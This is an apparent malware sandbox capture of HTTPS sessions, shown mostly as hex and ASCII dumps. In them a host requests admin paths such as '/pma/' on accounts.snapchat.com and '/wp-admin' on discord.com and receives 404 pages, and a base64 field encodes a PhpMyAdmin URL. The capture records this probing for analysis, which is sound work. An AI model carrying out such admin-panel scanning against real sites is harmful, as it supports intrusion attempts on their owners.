                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 55 4e 76 67 4f 61 4a 38 72 6c 51 51 34 66 48 6d 48 6a 69 57 42 70 69 54 5a 30 54 49 77 59 63 7a 48 33 4c 55 2d 62 44 50 68 30 51 62 4f 4b 64 66 6c 30 48 63 37 31 6b 37 67 42 45 7a 75 4c 79 6a 31 66 66 53 71 68 76 73 65 4d 7a 4d 53 64 52 70 4f 76 50 46 63 53 46 45 43 66 7a 5f 36 4c 34 76 73 56 39 48 53 69 37 66 57 68 57 52 6d 48 6d 6d 35 50 74 4e 33 6f 35 44 45 52 32 51 37 75 69 78 6a 30 54 33 49 39 42 49 57 59 6a 4f 73 61 66 72 6c 61 64 50 6f 6e 4a 34 79 2d 51 4b 56 4f 53 46 65 76 43 51 4c 55 56 6d 63 73 36 36 33 4b 79 44 59 75 70 65 51 57 62 69 7a 70 68 39 52 4c 4c 56 62 75 46 7a 6d 48 6f 5a 74 55 48 79 6f 61 30 4c 35 30 4e 63 47 4b 47 61 46 56 37 31 35 79 50 58 73 43 71 34 35 65 45 62 56 58 4e 38 41 4d 56 64 74 4f 35 43 6a 6e 78 42 64 77 50 5a 73 33 6e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: UNvgOaJ8rlQQ4fHmHjiWBpiTZ0TIwYczH3LU-bDPh0QbOKdfl0Hc71k7gBEzuLyj1ffSqhvseMzMSdRpOvPFcSFECfz_6L4vsV9HSi7fWhWRmHmm5PtN3o5DER2Q7uixj0T3I9BIWYjOsafrladPonJ4y-QKVOSFevCQLUVmcs663KyDYupeQWbizph9RLLVbuFzmHoZtUHyoa0L50NcGKGaFV715yPXsCq45eEbVXN8AMVdtO5CjnxBdwPZs3n
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 6d 43 72 31 52 79 4e 37 4a 74 6b 79 52 68 70 73 70 53 7a 64 59 5f 50 54 4e 65 4b 48 2d 33 5f 36 31 71 74 78 43 35 37 55 46 66 4a 5f 6f 4c 62 6b 4b 41 6e 33 6f 73 4c 39 6e 55 32 32 51 41 59 6d 6a 4b 38 76 6f 63 4b 6e 37 69 5a 5f 71 62 6d 6f 44 4c 79 4f 66 30 7a 6b 35 73 56 36 56 72 2d 4f 73 66 62 69 69 77 31 5a 5a 31 47 35 4a 2d 66 46 46 71 37 42 47 33 59 31 34 6a 51 6f 62 6e 57 34 6b 48 4e 50 6e 48 51 43 6c 61 30 54 37 57 56 62 48 6f 53 4d 5f 76 51 61 58 37 59 73 5a 5a 37 72 47 52 49 5a 48 6e 4c 70 36 74 35 51 58 33 2d 6b 58 62 38 66 35 6d 37 57 76 6e 7a 30 54 76 6d 43 66 37 33 58 4f 75 49 22 2c 63 52 71 3a 20 7b 72 75 3a 20 27 61 48 52 30 63 48 4d 36 4c 79 39 74 62 32 70 68 5a 47 39 32 5a 58 4a 68 4c 6e 4e 72 4c 31 42 6f 63 45 31 35 51 57 52 74 61 57 34
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: mCr1RyN7JtkyRhpspSzdY_PTNeKH-3_61qtxC57UFfJ_oLbkKAn3osL9nU22QAYmjK8vocKn7iZ_qbmoDLyOf0zk5sV6Vr-Osfbiiw1ZZ1G5J-fFFq7BG3Y14jQobnW4kHNPnHQCla0T7WVbHoSM_vQaX7YsZZ7rGRIZHnLp6t5QX3-kXb8f5m7Wvnz0TvmCf73XOuI",cRq: {ru: 'aHR0cHM6Ly9tb2phZG92ZXJhLnNrL1BocE15QWRtaW4


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                219192.168.2.64938434.149.46.130443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC175OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.snapchat.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC5706INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                set-cookie: sc-wcid=11e696ca-00e9-4715-9573-2d335896ff37; Path=/; Domain=.snapchat.com; Expires=Tue, 06-Feb-2024 11:16:12 GMT; Max-Age=86400; Secure
                                                                                                                                                                                                                                                                                                                                                                expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubdomains
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: allow-from https://iframe.arkoselabs.com
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;
                                                                                                                                                                                                                                                                                                                                                                x-content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;
                                                                                                                                                                                                                                                                                                                                                                x-cloud-trace-context: dd8c78bfe1eac2eaa63b7df1def66f48
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                server: API Gateway
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 664
                                                                                                                                                                                                                                                                                                                                                                via: 1.1 google, 1.1 google
                                                                                                                                                                                                                                                                                                                                                                alt-svc: clear
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC664INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 69 74 75 6e 65 73 2d 61 70 70 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 2d 69 64 3d 34 34 37 31 38 38 33 37 30 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 26 62
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head><meta charset="utf-8"><meta name="referrer" content="origin"><meta name="apple-itunes-app" content="app-id=447188370"><title>404 &b


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                220192.168.2.665395162.159.135.232443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC514OUTGET /wp-admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: __sdcfduid=f7108151c41711eea0b60fe64c998bd492e66eddc076b200708bdc05ed2cbe73d6bf4f0f17b0d993defd8d35f71a55a6; __dcfduid=f7108150c41711eea0b60fe64c998bd4; __cfruid=4baa323db44e46bd4cae3cd0c49bbf604761a6e9-1707131767; _cfuvid=N0HwRwubMMJeHixqQ0_rL53YlfItOl_odb0sQeo9LRk-1707131767090-0-604800000
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: https://discord.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC344INHTTP/1.1 404 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                CF-Ray: 850abd68ff8c450d-ATL
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Fri, 26 Jan 2024 19:46:37 GMT
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC2293INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 27 73 65 6c 66 27 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 6e 6f 6e 63 65 2d 4d 54 49 79 4c 44 63 35 4c 44 45 30 4f 53 77 78 4d 44 41 73 4d 6a 51 34 4c 44 45 31 4e 79 77 78 4e 54 51 73 4d 6a 55 3d 27 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 73 73 6c 2e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'nonce-MTIyLDc5LDE0OSwxMDAsMjQ4LDE1NywxNTQsMjU=' https://discord.com https://www.googletagmanager.com https://connect.facebook.net https://www.google-analytics.com https://ssl.
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 37 66 66 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 75 62 51 38 33 6b 7a 32 59 59 52 72 6c 65 4a 61 59 66 5f 43 59 62 76 44 5a 36 6c 58 56 6c 2d 4e 4c 5f 4d 57 58 31 55 6a 39 59 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 73 76 61 6c 69 64 61 74 65 2e 30 31 22 20 63 6f 6e 74 65 6e 74 3d 22 33 33 30 44 43 39 30 34 38 34 41 34 42 37 42 36 31 42 33 36 41 44 36 35 45 38 39 42 34 37 41 45 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7ff2<!DOCTYPE html><html lang="en-US"><head> <meta charset="utf-8" /> <meta name="google-site-verification" content="nubQ83kz2YYRrleJaYf_CYbvDZ6lXVl-NL_MWX1Uj9Y" /> <meta name="msvalidate.01" content="330DC90484A4B7B61B36AD65E89B47AE" /> <meta
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 74 2d 68 65 6c 6d 65 74 3d 22 74 72 75 65 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 44 69 73 63 6f 72 64 3c 2f 74 69 74 6c 65 3e 20 20 3c 21 2d 2d 20 65 6e 64 73 65 63 74 69 6f 6e 20 2d 2d 3e 3c 6d 65 74 61 20 64 61 74 61 2d 72 65 61 63 74 2d 68 65 6c 6d 65 74 3d 22 74 72 75 65 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 64 61 74 61 2d 72 65 61 63 74 2d 68 65 6c 6d 65 74 3d 22 74 72 75 65 22 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 44 69 73 63 6f 72 64 22 2f 3e 3c 6d 65 74 61 20 64 61 74 61 2d 72 65 61 63 74 2d 68 65 6c 6d 65 74 3d 22 74 72 75 65 22 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: t-helmet="true">Page Not Found | Discord</title> ... endsection --><meta data-react-helmet="true" charset="utf-8"/><meta data-react-helmet="true" property="og:title" content="Page Not Found | Discord"/><meta data-react-helmet="true" property="og:image"
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 39 4f 2d 35 34 5f 53 69 74 63 67 6d 78 51 4b 78 6c 41 26 67 74 6d 5f 70 72 65 76 69 65 77 3d 65 6e 76 2d 32 26 67 74 6d 5f 63 6f 6f 6b 69 65 73 5f 77 69 6e 3d 78 27 3b 20 66 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 6a 2c 20 66 29 3b 0a 20 20 20 20 7d 29 28 77 69 6e 64 6f 77 2c 20 64 6f 63 75 6d 65 6e 74 2c 20 27 73 63 72 69 70 74 27 2c 20 27 64 61 74 61 4c 61 79 65 72 27 2c 20 27 47 54 4d 2d 4e 37 42 56 43 32 57 27 29 3b 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 21 2d 2d 20 65 6e 64 73 65 63 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 21 2d 2d 20 73 65 63 74 69 6f 6e 3a 67 74 6d 4e 6f 53 63 72 69 70 74 2d 2d 3e 0a 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 69 66 72
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 9O-54_SitcgmxQKxlA&gtm_preview=env-2&gtm_cookies_win=x'; f.parentNode.insertBefore(j, f); })(window, document, 'script', 'dataLayer', 'GTM-N7BVC2W'); </script> ... endsection --></head><body> ... section:gtmNoScript--> <noscript> <ifr
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 34 2e 38 30 38 20 36 2e 39 33 35 38 37 20 32 34 2e 33 31 32 43 37 2e 31 35 32 38 36 20 32 34 2e 31 35 37 31 20 37 2e 33 36 39 38 36 20 32 33 2e 39 38 36 36 20 37 2e 35 37 31 33 35 20 32 33 2e 38 31 36 31 43 31 32 2e 36 32 34 31 20 32 36 2e 31 32 35 35 20 31 38 2e 30 39 36 39 20 32 36 2e 31 32 35 35 20 32 33 2e 30 38 37 36 20 32 33 2e 38 31 36 31 43 32 33 2e 33 30 34 36 20 32 33 2e 39 38 36 36 20 32 33 2e 35 30 36 31 20 32 34 2e 31 35 37 31 20 32 33 2e 37 32 33 31 20 32 34 2e 33 31 32 43 32 32 2e 38 38 36 31 20 32 34 2e 38 30 38 20 32 32 2e 30 31 38 32 20 32 35 2e 32 32 36 35 20 32 31 2e 31 30 33 37 20 32 35 2e 35 36 37 35 43 32 31 2e 35 38 34 32 20 32 36 2e 35 31 32 39 20 32 32 2e 31 34 32 32 20 32 37 2e 34 31 31 39 20 32 32 2e 37 36 32 31 20 32 38 2e 32
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 4.808 6.93587 24.312C7.15286 24.1571 7.36986 23.9866 7.57135 23.8161C12.6241 26.1255 18.0969 26.1255 23.0876 23.8161C23.3046 23.9866 23.5061 24.1571 23.7231 24.312C22.8861 24.808 22.0182 25.2265 21.1037 25.5675C21.5842 26.5129 22.1422 27.4119 22.7621 28.2
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 31 2e 36 37 37 34 43 36 34 2e 35 32 31 37 20 32 31 2e 34 34 34 39 20 36 33 2e 37 30 30 33 20 32 31 2e 31 30 33 39 20 36 32 2e 39 37 31 38 20 32 30 2e 36 33 38 39 56 31 37 2e 38 33 33 35 43 36 33 2e 35 32 39 38 20 31 38 2e 32 36 37 35 20 36 34 2e 32 35 38 32 20 31 38 2e 36 30 38 35 20 36 35 2e 31 38 38 32 20 31 38 2e 38 38 37 35 43 36 36 2e 31 31 38 31 20 31 39 2e 31 36 36 35 20 36 37 2e 30 31 37 31 20 31 39 2e 33 30 36 20 36 37 2e 38 38 35 31 20 31 39 2e 33 30 36 43 36 38 2e 32 38 38 20 31 39 2e 33 30 36 20 36 38 2e 35 39 38 20 31 39 2e 32 35 39 35 20 36 38 2e 37 39 39 35 20 31 39 2e 31 35 31 43 36 39 2e 30 30 31 20 31 39 2e 30 34 32 35 20 36 39 2e 31 30 39 35 20 31 38 2e 39 31 38 35 20 36 39 2e 31 30 39 35 20 31 38 2e 37 36 33 35 43 36 39 2e 31 30 39 35
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1.6774C64.5217 21.4449 63.7003 21.1039 62.9718 20.6389V17.8335C63.5298 18.2675 64.2582 18.6085 65.1882 18.8875C66.1181 19.1665 67.0171 19.306 67.8851 19.306C68.288 19.306 68.598 19.2595 68.7995 19.151C69.001 19.0425 69.1095 18.9185 69.1095 18.7635C69.1095
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 2e 39 34 36 32 20 31 33 2e 31 33 37 37 20 37 36 2e 36 39 30 31 20 31 32 2e 35 31 37 37 20 37 37 2e 36 36 36 36 20 31 32 2e 30 35 32 38 43 37 38 2e 36 34 33 20 31 31 2e 36 30 33 33 20 37 39 2e 38 32 31 20 31 31 2e 33 37 30 38 20 38 31 2e 31 38 34 39 20 31 31 2e 33 37 30 38 43 38 32 2e 38 37 34 33 20 31 31 2e 33 37 30 38 20 38 34 2e 32 36 39 33 20 31 31 2e 37 32 37 33 20 38 35 2e 33 38 35 32 20 31 32 2e 34 34 30 32 56 31 35 2e 35 32 34 36 43 38 34 2e 39 39 37 37 20 31 35 2e 32 36 31 31 20 38 34 2e 35 33 32 38 20 31 35 2e 30 32 38 36 20 38 34 2e 30 30 35 38 20 31 34 2e 38 37 33 36 43 38 33 2e 34 37 38 38 20 31 34 2e 37 30 33 31 20 38 32 2e 39 32 30 38 20 31 34 2e 36 32 35 36 20 38 32 2e 33 33 31 39 20 31 34 2e 36 32 35 36 43 38 31 2e 32 37 37 39 20 31 34 2e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: .9462 13.1377 76.6901 12.5177 77.6666 12.0528C78.643 11.6033 79.821 11.3708 81.1849 11.3708C82.8743 11.3708 84.2693 11.7273 85.3852 12.4402V15.5246C84.9977 15.2611 84.5328 15.0286 84.0058 14.8736C83.4788 14.7031 82.9208 14.6256 82.3319 14.6256C81.2779 14.
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 34 2e 34 38 36 31 20 39 33 2e 32 36 31 39 20 31 34 2e 34 38 36 31 43 39 32 2e 35 33 33 35 20 31 34 2e 34 38 36 31 20 39 31 2e 39 37 33 39 20 31 34 2e 36 38 37 36 20 39 31 2e 35 35 35 35 20 31 35 2e 30 39 30 36 43 39 31 2e 31 35 32 35 20 31 35 2e 34 39 33 36 20 39 30 2e 39 33 35 35 20 31 36 2e 30 32 30 36 20 39 30 2e 39 33 35 35 20 31 36 2e 37 30 32 35 43 39 30 2e 39 33 35 35 20 31 37 2e 33 38 34 35 20 39 31 2e 31 33 37 20 31 37 2e 39 32 37 20 39 31 2e 35 35 35 35 20 31 38 2e 33 32 39 39 43 39 31 2e 39 37 33 39 20 31 38 2e 37 34 38 34 20 39 32 2e 35 33 33 35 20 31 38 2e 39 34 39 39 20 39 33 2e 32 36 31 39 20 31 38 2e 39 34 39 39 43 39 33 2e 39 35 39 34 20 31 38 2e 39 33 34 34 20 39 34 2e 35 33 32 39 20 31 38 2e 37 33 32 39 20 39 34 2e 39 33 35 38 20 31 38
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 4.4861 93.2619 14.4861C92.5335 14.4861 91.9739 14.6876 91.5555 15.0906C91.1525 15.4936 90.9355 16.0206 90.9355 16.7025C90.9355 17.3845 91.137 17.927 91.5555 18.3299C91.9739 18.7484 92.5335 18.9499 93.2619 18.9499C93.9594 18.9344 94.5329 18.7329 94.9358 18
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 43 31 31 35 2e 32 38 38 20 31 37 2e 33 35 32 37 20 31 31 35 2e 34 38 39 20 31 37 2e 38 36 34 32 20 31 31 35 2e 39 30 38 20 31 38 2e 32 36 37 32 43 31 31 36 2e 33 32 36 20 31 38 2e 36 37 30 32 20 31 31 36 2e 38 36 39 20 31 38 2e 38 37 31 37 20 31 31 37 2e 35 36 36 20 31 38 2e 38 37 31 37 43 31 31 38 2e 32 36 35 20 31 38 2e 38 37 31 37 20 31 31 38 2e 38 32 33 20 31 38 2e 36 37 30 32 20 31 31 39 2e 32 34 32 20 31 38 2e 32 35 31 37 5a 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 64 3d 22 4d 35 38 2e 39 38 38 35 20 31 32 2e 34 30 39 31 43 36 30 2e 31 37 37 32 20 31 32 2e 34 30 39 31 20 36 31 2e 31 34 32 39 20 31 31 2e 35 34 31 36 20 36 31 2e 31 34 32 39 20 31 30 2e 34 37 31 37 43 36 31 2e 31 34 32 39 20 39 2e 34 30 31 36 34 20 36 30 2e 31 37 37 32 20 38 2e 35
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: C115.288 17.3527 115.489 17.8642 115.908 18.2672C116.326 18.6702 116.869 18.8717 117.566 18.8717C118.265 18.8717 118.823 18.6702 119.242 18.2517Z"></path><path d="M58.9885 12.4091C60.1772 12.4091 61.1429 11.5416 61.1429 10.4717C61.1429 9.40164 60.1772 8.5
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 37 33 33 20 36 2e 31 33 31 34 34 20 31 38 2e 38 35 36 33 20 36 2e 36 34 32 39 32 43 31 36 2e 34 39 38 39 20 36 2e 33 30 31 39 33 20 31 34 2e 31 35 38 35 20 36 2e 33 30 31 39 33 20 31 31 2e 38 33 33 36 20 36 2e 36 34 32 39 32 43 31 31 2e 36 31 36 36 20 36 2e 31 33 31 34 34 20 31 31 2e 32 39 31 31 20 35 2e 34 38 30 34 38 20 31 31 2e 30 32 37 36 20 35 43 38 2e 37 39 35 37 35 20 35 2e 33 37 31 39 38 20 36 2e 36 37 32 33 35 20 36 2e 30 33 38 34 35 20 34 2e 36 38 36 39 20 36 2e 39 35 32 39 43 30 2e 36 37 32 36 30 31 20 31 32 2e 38 37 33 36 20 2d 30 2e 34 31 32 33 35 20 31 38 2e 36 35 34 38 20 30 2e 31 33 30 31 32 34 20 32 34 2e 33 35 38 35 43 32 2e 37 39 35 39 39 20 32 36 2e 32 39 35 39 20 35 2e 33 36 38 38 39 20 32 37 2e 34 37 33 39 20 37 2e 38 39 36 38 32 20
